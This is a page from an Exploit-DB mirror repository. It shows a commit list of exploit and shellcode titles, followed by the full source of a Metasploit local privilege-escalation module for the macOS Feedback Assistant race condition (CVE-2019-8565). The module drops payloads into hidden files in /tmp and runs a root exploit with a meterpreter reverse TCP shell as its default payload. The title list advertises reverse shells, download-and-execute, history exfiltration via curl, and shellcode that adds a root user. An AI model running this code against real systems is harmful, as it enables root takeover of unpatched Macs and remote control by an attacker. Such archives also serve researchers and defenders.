bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/macos/local/46914.rb
Offensive Security 970f7b1104 DB: 2019-05-24 
18 changes to exploits/shellcodes

macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free
macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized
macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register
macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl
macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free
Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free
Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized
Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register
Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl
Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free
NetAware 1.20 - 'Add Block' Denial of Service (PoC)
NetAware 1.20 - 'Share Name' Denial of Service (PoC)
Terminal Services Manager 3.2.1 - Denial of Service
Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free
Microsoft Windows 10 (17763.379) - Install DLL
Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation
Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)
Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation
Microsoft Internet Explorer 11 - Sandbox Escape
Microsoft Windows - 'Win32k' Local Privilege Escalation

Axis Network Camera - .srv to parhand RCE (Metasploit)
Axis Network Camera - .srv to parhand Remote Code Execution (Metasploit)

HP Intelligent Management - Java Deserialization RCE (Metasploit)
HP Intelligent Management - Java Deserialization Remote Code Execution (Metasploit)

Erlang - Port Mapper Daemon Cookie RCE (Metasploit)
Erlang - Port Mapper Daemon Cookie Remote Code Execution (Metasploit)

CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)
AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)
Pimcore < 5.71 - Unserialize RCE (Metasploit)
AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)
Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)

Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)

Nagios XI 5.6.1 - SQL injection

BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind (31337/TCP) Shell (/bin/sh) Shellcode (94 bytes)

Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)
Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes)

Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes)

Linux/x86 - iptables --flush Shellcode (43 bytes)
Linux/x86 - Flush IPTables Rules (iptables --flush) Shellcode (43 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes)

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)
Linux/x86 - Reverse (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)

Linux/x86 - Reverse TCP (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)
Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)
Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)

Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)
Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)
macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)

Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)

Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)
Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)
Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)
Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)
Linux/x86 - Rabbit Shellcode Crypter (200 bytes)
Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)
Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)
Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)
Linux/x86 - Rabbit Encoder Shellcode  (200 bytes)
Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)
Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)
Linux/x86 - shred file Shellcode (72 bytes)
Linux/x86 - execve /bin/sh Shellcode (20 bytes)
Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
Linux x86_64 - Delete File Shellcode (28 bytes)
Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (20 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)
Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)
Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)
2019-05-24 05:02:03 +00:00

105 lines
No EOL
3.8 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Feedback Assistant Race Condition',
'Description' => %q{
This module exploits a race condition vulnerability in Mac's Feedback Assistant.
A successful attempt would result in remote code execution under the context of
root.
},
'License' => MSF_LICENSE,
'Author' => [
'CodeColorist', # Discovery and exploit
'timwr', # Metasploit module
],
'References' => [
['CVE', '2019-8565'],
['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe'],
['URL', 'https://support.apple.com/en-in/HT209600'],
['URL', 'https://github.com/ChiChou/sploits'],
],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Platform' => [ 'osx', 'python', 'unix' ],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
],
'DisclosureDate' => 'Apr 13 2019'))
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def upload_executable_file(filepath, filedata)
print_status("Uploading file: '#{filepath}'")
write_file(filepath, filedata)
chmod(filepath)
register_file_for_cleanup(filepath)
end
def check
version = Gem::Version.new(get_system_version)
if version >= Gem::Version.new('10.14.4')
CheckCode::Safe
else
CheckCode::Appears
end
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
case target['Arch']
when ARCH_X64
payload_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
upload_executable_file(payload_file, binary_payload)
root_cmd = payload_file
when ARCH_PYTHON
root_cmd = "echo \"#{payload.encoded}\" | python"
else
root_cmd = payload.encoded
end
root_cmd = root_cmd + " & \0"
if root_cmd.length > 1024
fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
end
exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8565", "exploit" ))
placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
exploit_data[placeholder_index, root_cmd.length] = root_cmd
exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
upload_executable_file(exploit_file, exploit_data)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec(exploit_file)
print_status("Exploit result:\n#{result}")
end
end
Reference in a new issue View git blame Copy permalink